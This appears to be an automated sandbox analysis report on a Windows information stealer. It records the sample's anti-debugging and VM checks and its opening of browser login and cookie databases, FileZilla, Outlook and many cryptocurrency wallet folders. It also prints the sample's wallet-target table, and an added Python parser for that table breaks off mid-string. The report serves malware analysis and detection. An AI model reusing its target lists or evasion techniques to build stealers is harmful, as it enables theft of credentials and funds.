Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA093D second address: 4CA0983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, ebx 0x0000000b jmp 00007FDFF9160A30h 0x00000010 mov ecx, dword ptr [ebp-10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDFF9160A37h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0983 second address: 4CA09D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007FDFF8F7915Fh 0x0000001b jmp 00007FDFF8F79163h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA09D1 second address: 4CA09E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDFF9160A34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA09E9 second address: 4CA09ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA09ED second address: 4CA0A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 jmp 00007FDFF9160A37h 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 pushfd 0x00000012 jmp 00007FDFF9160A2Bh 0x00000017 add cx, DADEh 0x0000001c jmp 00007FDFF9160A39h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 pushfd 0x00000024 jmp 00007FDFF9160A31h 0x00000029 sub al, 00000016h 0x0000002c jmp 00007FDFF9160A31h 0x00000031 popfd 0x00000032 popad 0x00000033 pop esi 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FDFF9160A2Ch 0x0000003b xor ch, 00000038h 0x0000003e jmp 00007FDFF9160A2Bh 0x00000043 popfd 0x00000044 push eax 0x00000045 push edx 0x00000046 movzx esi, dx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0A87 second address: 4CA0ABE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop esi 0x0000000c mov dx, CF98h 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FDFF8F79161h 0x00000017 jmp 00007FDFF8F7915Bh 0x0000001c popfd 0x0000001d popad 0x0000001e leave 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0ABE second address: 4CA0AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0AC4 second address: 4CA0ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C21 second address: 4CA0C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C25 second address: 4CA0C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDFF8F7915Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C3C second address: 4CA0C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C58 second address: 4CA0C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C5E second address: 4CA0C80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 push ebx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDFF9160A31h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C80 second address: 4CA0C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Special instruction interceptor: First address: 93F89F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Special instruction interceptor: First address: 93F964 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Special instruction interceptor: First address: ADFB40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Special instruction interceptor: First address: AE96D6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Special instruction interceptor: First address: B6A573 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe TID: 1476 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe TID: 3176 Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4EC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C4EC930
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: h4ZgewNxoj.exe, h4ZgewNxoj.exe, 00000000.00000002.2466503871.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: CFIEGDAE.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: CFIEGDAE.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: CFIEGDAE.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: CFIEGDAE.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: CFIEGDAE.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: CFIEGDAE.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: CFIEGDAE.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: CFIEGDAE.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: CFIEGDAE.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: CFIEGDAE.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: CFIEGDAE.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: CFIEGDAE.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: CFIEGDAE.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: CFIEGDAE.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: CFIEGDAE.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: h4ZgewNxoj.exe, 00000000.00000002.2466503871.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CFIEGDAE.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: CFIEGDAE.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: NTICE
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: SICE
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: SIWVID
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C535FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C535FF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C53C410
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C50B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C50B66C
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C50B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C50B1F7
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
Source: h4ZgewNxoj.exe, h4ZgewNxoj.exe, 00000000.00000002.2466503871.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: EPProgram Manager
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C50B341 cpuid 0_2_6C50B341
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4D35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C4D35A0

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.2466300957.00000000006F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2074987962.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\*.*J
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonl=
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2466300957.00000000007C4000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
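The wallet-target string recovered from memory above is a flat, pipe-delimited table, and the "File opened" events that follow it are that table expanded against the sandbox user's profile. The parser below, added here as an illustration and not code from the sample or from the sandbox, splits the string into its five-field records, resolves each to the directory the stealer enumerates, and maps observed directory opens back to the entry that caused them. Only an excerpt of the string is embedded; the meaning of root code 1 (%APPDATA%) is inferred from the opened paths in the report, root code 2 (%USERPROFILE%) is an assumption based on where Chia keeps its data, and the trailing 0/1 flag is left uninterpreted because the report does not explain it.

```python
"""Parse the wallet-target list recovered from the stealer's memory and
resolve each entry to the directory it would open on disk.

Added example written for this report; not code from the sample or from the
sandbox. Root-code meanings are inferred from the report (see ROOT_NOTE).
"""
from __future__ import annotations

from dataclasses import dataclass
from fnmatch import fnmatchcase
from typing import Dict, Iterable, List

# Excerpt of the string shown in the report (the full string has 35 records
# of the same shape). Record layout: name|root|relative_dir|file_mask|flag
WALLET_CONFIG_EXCERPT = (
    r"Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|"
    r"Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|"
    r"Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|"
    r"Ledger Live|1|\Ledger Live\|*.*|0|"
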